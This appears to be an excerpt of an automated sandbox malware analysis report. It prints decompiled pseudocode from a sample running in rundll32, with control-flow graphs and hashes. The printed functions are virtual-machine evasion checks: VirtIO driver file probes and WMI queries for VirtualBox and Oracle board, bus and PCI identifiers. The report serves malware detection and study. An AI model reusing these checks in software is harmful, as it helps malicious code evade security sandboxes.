                • Instruction ID: 86f5e97a0a4bbce329b002fe15e6d733dd489628ebd6451e0e3cfa56800a0633
                • Opcode Fuzzy Hash: 3774e90ebb1ffb59e462e348ed298952ad424a19e35e36385dbe4d8072061f51
                • Instruction Fuzzy Hash: 8751E637302F65CAEB208F25E89869877A0FB98B98F545155DE4E53B68DF38D548C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CF410 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 125COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1175 215205cf410-215205cf4fd call 215205f8ef0 * 2 GetWindowsDirectoryW call 215205d00a0 1182 215205cf4ff-215205cf504 Wow64DisableWow64FsRedirection 1175->1182 1183 215205cf50a-215205cf50f 1175->1183 1182->1183 1184 215205cf510-215205cf563 PathCombineW call 215205f8ef0 call 215205cd1d0 GetFileAttributesW 1183->1184 1189 215205cf569-215205cf570 1184->1189 1190 215205cf565-215205cf567 1184->1190 1189->1184 1192 215205cf572 1189->1192 1190->1189 1191 215205cf574 1190->1191 1193 215205cf579-215205cf589 1191->1193 1192->1193 1194 215205cf590-215205cf593 1193->1194 1195 215205cf5a2-215205cf5b1 1194->1195 1196 215205cf595-215205cf59e 1194->1196 1198 215205cf601-215205cf62a call 215205f59d0 1195->1198 1199 215205cf5b3-215205cf5b5 1195->1199 1196->1194 1197 215205cf5a0 1196->1197 1197->1198 1201 215205cf5b8-215205cf5bb 1199->1201 1203 215205cf5bd-215205cf5c6 1201->1203 1204 215205cf5ca-215205cf5d8 1201->1204 1203->1201 1205 215205cf5c8 1203->1205 1206 215205cf5df-215205cf5f4 GetCurrentProcess 1204->1206 1207 215205cf5da 1204->1207 1205->1206 1206->1198 1209 215205cf5f6-215205cf5fb Wow64RevertWow64FsRedirection 1206->1209 1207->1206 1209->1198
                C-Code - Quality: 55%
                			E00000215215205CF410(void* __ecx, long long __rbx, signed long long __rdi, long long __rsi) {
				signed char _t60;
				void* _t76;
				void* _t80;
				signed long long _t93;
				signed long long _t107;
				void* _t128;
				signed long long _t133;
				WCHAR* _t138;
				void* _t141;
				signed long long _t142;
				void* _t144;

				_t133 = __rdi;
				_t68 = __ecx;
				 *((long long*)(_t141 + 8)) = __rbx;
				 *((long long*)(_t141 + 0x10)) = __rsi;
				 *((long long*)(_t141 + 0x18)) = __rdi;
				_t139 = _t141 - 0x5b0;
				_t142 = _t141 - 0x6b0;
				_t93 =  *0x2067c720; // 0xca1645d940e
				 *(_t141 - 0x5b0 + 0x5a0) = _t93 ^ _t142;
				 *((long long*)(_t142 + 0x30)) = L"System32\\drivers\\balloon.sys";
				r8d = 0x208;
				 *((long long*)(_t142 + 0x38)) = L"System32\\drivers\\netkvm.sys";
				 *((long long*)(_t142 + 0x40)) = L"System32\\drivers\\pvpanic.sys";
				 *((long long*)(_t142 + 0x48)) = L"System32\\drivers\\viofs.sys";
				 *((long long*)(_t142 + 0x50)) = L"System32\\drivers\\viogpudo.sys";
				 *((long long*)(_t142 + 0x58)) = L"System32\\drivers\\vioinput.sys";
				 *((long long*)(_t142 + 0x60)) = L"System32\\drivers\\viorng.sys";
				 *((long long*)(_t142 + 0x68)) = L"System32\\drivers\\vioscsi.sys";
				 *((long long*)(_t142 + 0x70)) = L"System32\\drivers\\vioser.sys";
				 *((long long*)(_t142 + 0x78)) = L"System32\\drivers\\viostor.sys";
				E00000215215205F8EF0(__ecx, 0, _t76, _t80, _t141 - 0x5b0 + 0x190, _t128, __rdi, _t144);
				r8d = 0x208;
				E00000215215205F8EF0(_t68, 0, _t76, _t80, _t139 - 0x80, _t128, _t133, _t144);
				 *(_t142 + 0x28) = _t133;
				GetWindowsDirectoryW(_t138);
				if (E00000215215205D00A0() == 0) goto 0x205cf50a;
				__imp__Wow64DisableWow64FsRedirection();
				_t107 = _t133;
				__imp__PathCombineW();
				r8d = 0x200;
				E00000215215205F8EF0(_t68, 0, 0, _t80, _t139 + 0x3a0, _t139 + 0x190, _t133,  *((intOrPtr*)(_t142 + 0x30 + _t107 * 8)));
				E00000215215205CD1D0(_t68, L"System32\\drivers\\viostor.sys", _t139 + 0x3a0, _t139 + 0x190, L"Checking file %s ", _t139 - 0x80);
				_t60 = GetFileAttributesW(??); // executed
				if (_t60 == 0xffffffff) goto 0x205cf569;
				if ((_t60 & 0x00000010) == 0) goto 0x205cf574;
				if (_t107 + 1 - 0xa < 0) goto 0x205cf510;
				goto 0x205cf579;
				 *((intOrPtr*)(_t142 + 0x20)) = 0;
				if ( *0x2067e430 == 8) goto 0x205cf5a2;
				if (1 - 0x1e < 0) goto 0x205cf590;
				goto 0x205cf601;
				if ( *0x2152067E484 == dil) goto 0x205cf601;
				if ( *0x2067e430 == 8) goto 0x205cf5ca;
				if (1 - 0x1e < 0) goto 0x205cf5b8;
				goto 0x205cf5df;
				if ( *0x2152067E46C == dil) goto 0x205cf5df;
				GetCurrentProcess();
				 *((long long*)( *0x2152067E488))();
				if ( *((intOrPtr*)(_t142 + 0x20)) == 0) goto 0x205cf601;
				__imp__Wow64RevertWow64FsRedirection();
				return E00000215215205F59D0(1,  *(_t139 + 0x5a0) ^ _t142, _t142 + 0x20, _t139 - 0x80);
			}














                0x215205cf410
                0x215205cf410
                0x215205cf410
                0x215205cf415
                0x215205cf41a
                0x215205cf420
                0x215205cf428
                0x215205cf42f
                0x215205cf439
                0x215205cf449
                0x215205cf45c
                0x215205cf462
                0x215205cf46e
                0x215205cf47a
                0x215205cf486
                0x215205cf492
                0x215205cf49e
                0x215205cf4aa
                0x215205cf4b6
                0x215205cf4c2
                0x215205cf4c7
                0x215205cf4d2
                0x215205cf4d8
                0x215205cf4eb
                0x215205cf4f0
                0x215205cf4fd
                0x215205cf504
                0x215205cf50c
                0x215205cf520
                0x215205cf52f
                0x215205cf535
                0x215205cf551
                0x215205cf55a
                0x215205cf563
                0x215205cf567
                0x215205cf570
                0x215205cf572
                0x215205cf580
                0x215205cf593
                0x215205cf59e
                0x215205cf5a0
                0x215205cf5b1
                0x215205cf5bb
                0x215205cf5c6
                0x215205cf5c8
                0x215205cf5d8
                0x215205cf5df
                0x215205cf5ed
                0x215205cf5f4
                0x215205cf5fb
                0x215205cf62a

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                • String ID: Checking file %s $System32\drivers\balloon.sys$System32\drivers\netkvm.sys$System32\drivers\pvpanic.sys$System32\drivers\viofs.sys$System32\drivers\viogpudo.sys$System32\drivers\vioinput.sys$System32\drivers\viorng.sys$System32\drivers\vioscsi.sys$System32\drivers\vioser.sys$System32\drivers\viostor.sys
                • API String ID: 2137468328-3181514389
                • Opcode ID: da6447d01ef5b2ade75ee0643974bd2b849857eb3f01f09764cc032b8923eaac
                • Instruction ID: bed3a9b9e9e377a8a19497d78d749ff56a5dd7c56306a83195207638603b5699
                • Opcode Fuzzy Hash: da6447d01ef5b2ade75ee0643974bd2b849857eb3f01f09764cc032b8923eaac
                • Instruction Fuzzy Hash: 21515B33312F60C5EB60CB14E8582DA73A5FBE9794FA40162DE8E46BA8EF38C545C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CE7D0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 166memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1210 215205ce7d0-215205ce802 call 215205d0410 1213 215205ce808-215205ce84e SysAllocString * 2 1210->1213 1214 215205cea47-215205cea54 1210->1214 1215 215205ce850-215205ce853 1213->1215 1216 215205ce8a5-215205ce8b0 1213->1216 1217 215205ce89c-215205ce89f SysFreeString 1215->1217 1218 215205ce855-215205ce871 1215->1218 1219 215205ce8b2-215205ce8b5 SysFreeString 1216->1219 1220 215205ce8bb-215205ce8cb 1216->1220 1217->1216 1225 215205ce87b-215205ce87d 1218->1225 1219->1220 1221 215205ce8d1-215205ce8f6 1220->1221 1222 215205cea34-215205cea46 1220->1222 1223 215205cea14-215205cea2e CoUninitialize 1221->1223 1224 215205ce8fc 1221->1224 1223->1222 1226 215205ce900-215205ce91d 1224->1226 1225->1217 1227 215205ce87f-215205ce896 CoUninitialize 1225->1227 1232 215205ce923-215205ce93f 1226->1232 1233 215205cea10 1226->1233 1227->1217 1236 215205ce945-215205ce947 1232->1236 1233->1223 1237 215205ce949-215205ce94e 1236->1237 1238 215205ce977-215205ce9c3 1236->1238 1237->1238 1239 215205ce950-215205ce954 1237->1239 1243 215205ce9f3-215205ce9ff 1238->1243 1244 215205ce9c5-215205ce9ca 1238->1244 1240 215205ce96d-215205ce971 VariantClear 1239->1240 1241 215205ce956-215205ce969 call 215205f9740 1239->1241 1240->1238 1241->1240 1243->1233 1252 215205cea01-215205cea08 1243->1252 1244->1243 1246 215205ce9cc-215205ce9d0 1244->1246 1248 215205ce9d2-215205ce9e5 call 215205f9740 1246->1248 1249 215205ce9e9-215205ce9ed VariantClear 1246->1249 1248->1249 1249->1243 1252->1226 1254 215205cea0e 1252->1254 1254->1223
                C-Code - Quality: 16%
                			E00000215215205CE7D0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14) {
				void* __rbx;
				void* _t74;
				void* _t75;
				void* _t93;
				long long _t117;
				long long _t119;
				void* _t122;
				intOrPtr* _t131;
				long long _t156;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t168;
				long long _t173;

				_t156 = __rsi;
				_t159 = _t160 - 0x47;
				_t161 = _t160 - 0x90;
				r15d = 0;
				 *((long long*)(_t159 + 0x7f)) = _t173;
				 *((long long*)(_t159 - 0x19)) = _t173;
				 *((long long*)(_t159 + 0x77)) = _t173;
				_t75 = E00000215215205D0410(_t74, _t159 + 0x7f, _t159 - 0x19, __rsi); // executed
				if (_t75 == 0) goto 0x205cea47;
				 *((long long*)(_t161 + 0x88)) = _t156;
				 *((long long*)(_t161 + 0x80)) = __rdi;
				 *((long long*)(_t161 + 0x78)) = __r12;
				 *((long long*)(_t161 + 0x70)) = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0x205ce8a5;
				if (__rax == 0) goto 0x205ce89c;
				 *((long long*)(_t161 + 0x28)) = _t159 + 0x77;
				_t14 = _t173 + 0x30; // 0x30
				r9d = _t14;
				 *((long long*)(_t161 + 0x20)) = _t173;
				_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f))));
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0xa0))() >= 0) goto 0x205ce89c;
				r14d = r15d;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
				_t117 =  *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19))));
				 *((intOrPtr*)(_t117 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0x205ce8bb;
				__imp__#6();
				if (r14d == 0) goto 0x205cea34;
				_t131 =  *((intOrPtr*)(_t159 + 0x77));
				 *((long long*)(_t159 + 0x6f)) = _t173;
				 *((intOrPtr*)(_t159 + 0x67)) = r15d;
				 *(_t159 - 0x11) = r15w;
				 *((long long*)(_t159 - 0xf)) = _t117;
				 *((long long*)(_t159 - 7)) = _t117;
				 *((intOrPtr*)(_t159 + 1)) = 0;
				 *((short*)(_t159 + 5)) = 0;
				if (_t131 == 0) goto 0x205cea14;
				 *((long long*)(_t161 + 0x20)) = _t159 + 0x67;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t131 + 0x20))();
				if ( *((intOrPtr*)(_t159 + 0x67)) == r15d) goto 0x205cea10;
				 *((long long*)(_t161 + 0x28)) = _t173;
				r8d = 0;
				 *((long long*)(_t161 + 0x20)) = _t173;
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))); // executed
				 *((intOrPtr*)(_t119 + 0x20))();
				if (0 < 0) goto 0x205ce977;
				if ( *(_t159 - 0x11) == r12w) goto 0x205ce977;
				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0x205ce96d;
				E00000215215205F9740(_t122,  *((intOrPtr*)(_t159 - 9)), L"VirtualBox",  *((intOrPtr*)(_t161 + 0x88)),  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))), _t168);
				_t92 =  !=  ? r12d : r15d;
				__imp__#9();
				 *(_t159 + 7) = r15w;
				 *((long long*)(_t159 + 0x11)) = _t119;
				 *((long long*)(_t159 + 9)) = _t119;
				r8d = 0;
				asm("movups xmm0, [ebp+0x7]");
				 *((intOrPtr*)(_t159 + 0x19)) = 0;
				 *((short*)(_t159 + 0x1d)) = 0;
				asm("movsd xmm1, [ebp+0x17]");
				asm("movups [ebp-0x11], xmm0");
				 *((long long*)(_t161 + 0x28)) = _t173;
				asm("movsd [ebp-0x1], xmm1");
				 *((long long*)(_t161 + 0x20)) = _t173;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x20))();
				if (0 < 0) goto 0x205ce9f3;
				if ( *(_t159 - 0x11) == r12w) goto 0x205ce9f3;
				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0x205ce9e9;
				E00000215215205F9740(_t122,  *((intOrPtr*)(_t159 - 9)), L"Oracle Corporation",  *((intOrPtr*)(_t161 + 0x88)), _t167, _t168);
				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x10))();
				if (_t93 != 0) goto 0x205cea10;
				if ( *((intOrPtr*)(_t159 + 0x77)) != 0) goto 0x205ce900;
				goto 0x205cea14;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x77)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19)))) + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t93;
			}

















                0x215205ce7d0
                0x215205ce7d5
                0x215205ce7da
                0x215205ce7e1
                0x215205ce7ec
                0x215205ce7f0
                0x215205ce7f7
                0x215205ce7fb
                0x215205ce802
                0x215205ce808
                0x215205ce817
                0x215205ce81f
                0x215205ce824
                0x215205ce829
                0x215205ce839
                0x215205ce83f
                0x215205ce848
                0x215205ce84e
                0x215205ce853
                0x215205ce85d
                0x215205ce862
                0x215205ce862
                0x215205ce869
                0x215205ce871
                0x215205ce87d
                0x215205ce883
                0x215205ce889
                0x215205ce890
                0x215205ce893
                0x215205ce896
                0x215205ce89f
                0x215205ce8b0
                0x215205ce8b5
                0x215205ce8cb
                0x215205ce8d1
                0x215205ce8d7
                0x215205ce8db
                0x215205ce8df
                0x215205ce8e4
                0x215205ce8e8
                0x215205ce8ec
                0x215205ce8ef
                0x215205ce8f6
                0x215205ce907
                0x215205ce913
                0x215205ce916
                0x215205ce91d
                0x215205ce92b
                0x215205ce937
                0x215205ce93a
                0x215205ce93f
                0x215205ce942
                0x215205ce947
                0x215205ce94e
                0x215205ce954
                0x215205ce961
                0x215205ce969
                0x215205ce971
                0x215205ce981
                0x215205ce986
                0x215205ce991
                0x215205ce995
                0x215205ce998
                0x215205ce99c
                0x215205ce99f
                0x215205ce9a3
                0x215205ce9a8
                0x215205ce9ac
                0x215205ce9b1
                0x215205ce9b9
                0x215205ce9be
                0x215205ce9c3
                0x215205ce9ca
                0x215205ce9d0
                0x215205ce9dd
                0x215205ce9e5
                0x215205ce9ed
                0x215205ce9fa
                0x215205ce9ff
                0x215205cea08
                0x215205cea0e
                0x215205cea17
                0x215205cea21
                0x215205cea2b
                0x215205cea2e
                0x215205cea46

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocClearFreeUninitializeVariantwcsstr$Initialize
                • String ID: Manufacturer$Oracle Corporation$Product$SELECT * FROM Win32_BaseBoard$VirtualBox$WQL
                • API String ID: 1018877641-1142199694
                • Opcode ID: a780dd9e34307c8a827ecc1d16c4eeaa75148d7a098379656ac2af1612e76257
                • Instruction ID: be4762a26674e658d5c489d09d88b76cfad301ea38da4f8b1a0877fac29be7b9
                • Opcode Fuzzy Hash: a780dd9e34307c8a827ecc1d16c4eeaa75148d7a098379656ac2af1612e76257
                • Instruction Fuzzy Hash: FE811F37702F50CAEB60DF39E8983AD33A4FB98B88F5085569E4957A68DF38D159C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CE5C0 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 142memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1255 215205ce5c0-215205ce5e7 call 215205d0410 1258 215205ce7c3-215205ce7cb 1255->1258 1259 215205ce5ed-215205ce62d SysAllocString * 2 1255->1259 1260 215205ce684-215205ce687 1259->1260 1261 215205ce62f-215205ce632 1259->1261 1262 215205ce692-215205ce69a 1260->1262 1263 215205ce689-215205ce68c SysFreeString 1260->1263 1264 215205ce634-215205ce650 1261->1264 1265 215205ce67b-215205ce67e SysFreeString 1261->1265 1266 215205ce6a0-215205ce6b2 1262->1266 1267 215205ce7ab-215205ce7c2 1262->1267 1263->1262 1270 215205ce65a-215205ce65c 1264->1270 1265->1260 1268 215205ce78b-215205ce7a5 CoUninitialize 1266->1268 1269 215205ce6b8 1266->1269 1268->1267 1271 215205ce6c0-215205ce6dc 1269->1271 1270->1265 1272 215205ce65e-215205ce675 CoUninitialize 1270->1272 1277 215205ce6e2-215205ce700 1271->1277 1278 215205ce77c 1271->1278 1272->1265 1283 215205ce706-215205ce708 1277->1283 1279 215205ce780-215205ce783 1278->1279 1279->1268 1281 215205ce785-215205ce787 1279->1281 1281->1268 1284 215205ce763-215205ce774 1283->1284 1285 215205ce70a-215205ce712 1283->1285 1284->1271 1291 215205ce77a 1284->1291 1285->1284 1286 215205ce714-215205ce716 1285->1286 1287 215205ce759-215205ce75d VariantClear 1286->1287 1288 215205ce718-215205ce72b call 215205f9740 1286->1288 1287->1284 1293 215205ce72d-215205ce740 call 215205f9740 1288->1293 1294 215205ce757 1288->1294 1291->1279 1293->1294 1297 215205ce742-215205ce755 call 215205f9740 1293->1297 1294->1287 1297->1287 1297->1294
                C-Code - Quality: 26%
                			E00000215215205CE5C0(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, long long __r15, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v72;
				signed short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* _t53;
				void* _t54;
				signed char _t60;
				intOrPtr _t99;
				intOrPtr* _t112;
				long long _t133;
				long long _t134;
				void* _t145;

				_t134 = __rsi;
				_a24 = _t133;
				_v88 = _t133;
				_a16 = _t133;
				_t54 = E00000215215205D0410(_t53,  &_a24,  &_v88, __rsi); // executed
				if (_t54 == 0) goto 0x205ce7c3;
				_v24 = __rbx;
				_v32 = _t134;
				_v40 = __r14;
				_v48 = __r15;
				__imp__#2();
				_t135 = __rax;
				__imp__#2();
				r15d = 1;
				_t102 = __rax;
				r14d = r15d;
				if (__rax == 0) goto 0x205ce684;
				if (__rax == 0) goto 0x205ce67b;
				_v96 =  &_a16;
				_t13 = _t133 + 0x30; // 0x31
				r9d = _t13;
				_v104 = _t133;
				_t144 =  *_a24;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x205ce67b;
				r14d = 0;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0x205ce692;
				__imp__#6();
				if (r14d == 0) goto 0x205ce7ab;
				_t112 = _a16;
				_a32 = _t133;
				_a8 = 0;
				if (_t112 == 0) goto 0x205ce78b;
				_v104 =  &_a8;
				r8d = r15d; // executed
				 *((intOrPtr*)( *_t112 + 0x20))();
				if (_a8 == 0) goto 0x205ce77c;
				_v96 = _t133;
				r8d = 0;
				_v104 = _t133;
				_t99 =  *_a32; // executed
				if ( *((intOrPtr*)(_t99 + 0x20))() < 0) goto 0x205ce763;
				_t60 = _v80 & 0x0000ffff;
				if (_t60 == r15w) goto 0x205ce763;
				if ((_t60 & 0x00000008) == 0) goto 0x205ce759;
				E00000215215205F9740(__rax, _v72, L"ACPIBus_BUS_0", __rax,  *_a24, _t145);
				if (_t99 != 0) goto 0x205ce757;
				E00000215215205F9740(_t102, _v72, L"PCI_BUS_0", _t135, _t144, _t145);
				if (_t99 != 0) goto 0x205ce757;
				E00000215215205F9740(_t102, _v72, L"PNP_BUS_0", _t135, _t144, _t145);
				if (_t99 == 0) goto 0x205ce759;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_a16 != 0) goto 0x205ce6c0;
				goto 0x205ce780;
				if (1 != 3) goto 0x205ce78b;
				_t74 =  ==  ? r15d : 0;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				_t68 =  ==  ? r15d : 0;
				return  ==  ? r15d : 0;
			}




















                0x215205ce5c0
                0x215205ce5d4
                0x215205ce5d8
                0x215205ce5dc
                0x215205ce5e0
                0x215205ce5e7
                0x215205ce5ed
                0x215205ce5f9
                0x215205ce5fe
                0x215205ce603
                0x215205ce608
                0x215205ce615
                0x215205ce618
                0x215205ce61e
                0x215205ce624
                0x215205ce627
                0x215205ce62d
                0x215205ce632
                0x215205ce63c
                0x215205ce641
                0x215205ce641
                0x215205ce648
                0x215205ce650
                0x215205ce65c
                0x215205ce662
                0x215205ce668
                0x215205ce672
                0x215205ce675
                0x215205ce67e
                0x215205ce687
                0x215205ce68c
                0x215205ce69a
                0x215205ce6a0
                0x215205ce6a6
                0x215205ce6ac
                0x215205ce6b2
                0x215205ce6c7
                0x215205ce6d3
                0x215205ce6d6
                0x215205ce6dc
                0x215205ce6ea
                0x215205ce6f6
                0x215205ce6f9
                0x215205ce700
                0x215205ce708
                0x215205ce70a
                0x215205ce712
                0x215205ce716
                0x215205ce723
                0x215205ce72b
                0x215205ce738
                0x215205ce740
                0x215205ce74d
                0x215205ce755
                0x215205ce75d
                0x215205ce76a
                0x215205ce774
                0x215205ce77a
                0x215205ce783
                0x215205ce787
                0x215205ce78e
                0x215205ce798
                0x215205ce7a2
                0x215205ce7a5
                0x215205ce7b0
                0x215205ce7c2

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$wcsstr$AllocFreeUninitialize$ClearInitializeVariant
                • String ID: ACPIBus_BUS_0$Name$PCI_BUS_0$PNP_BUS_0$SELECT * FROM Win32_Bus$WQL
                • API String ID: 2365594256-2399075642
                • Opcode ID: ff302871172b224dc8927fc2b44e2653cae8e68db5273b81e6e393684635a794
                • Instruction ID: 1213faf92f01bc72e19dc5ad4059c11d00fbfbed853f36c1a3bcd3c4bc4a413e
                • Opcode Fuzzy Hash: ff302871172b224dc8927fc2b44e2653cae8e68db5273b81e6e393684635a794
                • Instruction Fuzzy Hash: 9D511637702F60C6EB208F25E8886D867A4FBE8B98F140156EE4E57B68DF38D485C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CE1C0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 133memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1300 215205ce1c0-215205ce1ed call 215205d0410 1303 215205ce1f3-215205ce233 SysAllocString * 2 1300->1303 1304 215205ce38c-215205ce396 1300->1304 1305 215205ce28a-215205ce292 1303->1305 1306 215205ce235-215205ce238 1303->1306 1307 215205ce294-215205ce297 SysFreeString 1305->1307 1308 215205ce29d-215205ce2aa 1305->1308 1309 215205ce281-215205ce284 SysFreeString 1306->1309 1310 215205ce23a-215205ce256 1306->1310 1307->1308 1311 215205ce2b0-215205ce2bf 1308->1311 1312 215205ce37c-215205ce38b 1308->1312 1309->1305 1315 215205ce260-215205ce262 1310->1315 1313 215205ce2c5-215205ce2cf 1311->1313 1314 215205ce358-215205ce376 CoUninitialize 1311->1314 1316 215205ce2d0-215205ce2ed 1313->1316 1314->1312 1315->1309 1317 215205ce264-215205ce27b CoUninitialize 1315->1317 1316->1314 1321 215205ce2ef-215205ce30b 1316->1321 1317->1309 1324 215205ce311-215205ce313 1321->1324 1326 215205ce33d-215205ce349 1324->1326 1327 215205ce315-215205ce31a 1324->1327 1326->1314 1333 215205ce34b-215205ce352 1326->1333 1328 215205ce333-215205ce337 VariantClear 1327->1328 1329 215205ce31c-215205ce32f call 215205f9740 1327->1329 1328->1326 1329->1328 1333->1314 1333->1316
                C-Code - Quality: 20%
                			E00000215215205CE1C0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t49;
				void* _t50;
				void* _t63;
				void* _t86;
				intOrPtr* _t95;
				long long _t115;
				void* _t126;
				long long _t131;

				_t115 = __rsi;
				r15d = 0;
				_a16 = _t131;
				_v88 = _t131;
				_a24 = _t131;
				_t50 = E00000215215205D0410(_t49,  &_a16,  &_v88, __rsi); // executed
				if (_t50 == 0) goto 0x205ce38c;
				_v32 = _t115;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0x205ce28a;
				if (__rax == 0) goto 0x205ce281;
				_v96 =  &_a24;
				_t13 = _t131 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t131;
				if ( *((intOrPtr*)( *_a16 + 0xa0))() >= 0) goto 0x205ce281;
				r14d = r15d;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0x205ce29d;
				__imp__#6();
				if (r14d == 0) goto 0x205ce37c;
				_t95 = _a24;
				_a32 = _t131;
				_a8 = r15d;
				if (_t95 == 0) goto 0x205ce358;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t95 + 0x20))();
				if (_a8 == r15d) goto 0x205ce358;
				_v96 = _t131;
				r8d = 0;
				_v104 = _t131;
				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0x205ce33d;
				if (_v80 != 8) goto 0x205ce333;
				E00000215215205F9740(_t86, _v72, L"PCI\\VEN_80EE&DEV_CAFE", _v32,  *_a16, _t126);
				_t63 =  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_t63 != 0) goto 0x205ce358;
				if (_a24 != 0) goto 0x205ce2d0;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t63;
			}





















                0x215205ce1c0
                0x215205ce1cc
                0x215205ce1d7
                0x215205ce1db
                0x215205ce1e2
                0x215205ce1e6
                0x215205ce1ed
                0x215205ce1f3
                0x215205ce1ff
                0x215205ce204
                0x215205ce209
                0x215205ce20e
                0x215205ce21e
                0x215205ce224
                0x215205ce22d
                0x215205ce233
                0x215205ce238
                0x215205ce242
                0x215205ce247
                0x215205ce247
                0x215205ce24e
                0x215205ce262
                0x215205ce268
                0x215205ce26e
                0x215205ce278
                0x215205ce27b
                0x215205ce284
                0x215205ce292
                0x215205ce297
                0x215205ce2aa
                0x215205ce2b0
                0x215205ce2b4
                0x215205ce2b8
                0x215205ce2bf
                0x215205ce2c5
                0x215205ce2d7
                0x215205ce2e3
                0x215205ce2e6
                0x215205ce2ed
                0x215205ce2f7
                0x215205ce303
                0x215205ce306
                0x215205ce313
                0x215205ce31a
                0x215205ce327
                0x215205ce32f
                0x215205ce337
                0x215205ce344
                0x215205ce349
                0x215205ce352
                0x215205ce35f
                0x215205ce369
                0x215205ce373
                0x215205ce376
                0x215205ce38b

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                • String ID: DeviceId$PCI\VEN_80EE&DEV_CAFE$SELECT * FROM Win32_PnPEntity$WQL
                • API String ID: 1998430482-342862491
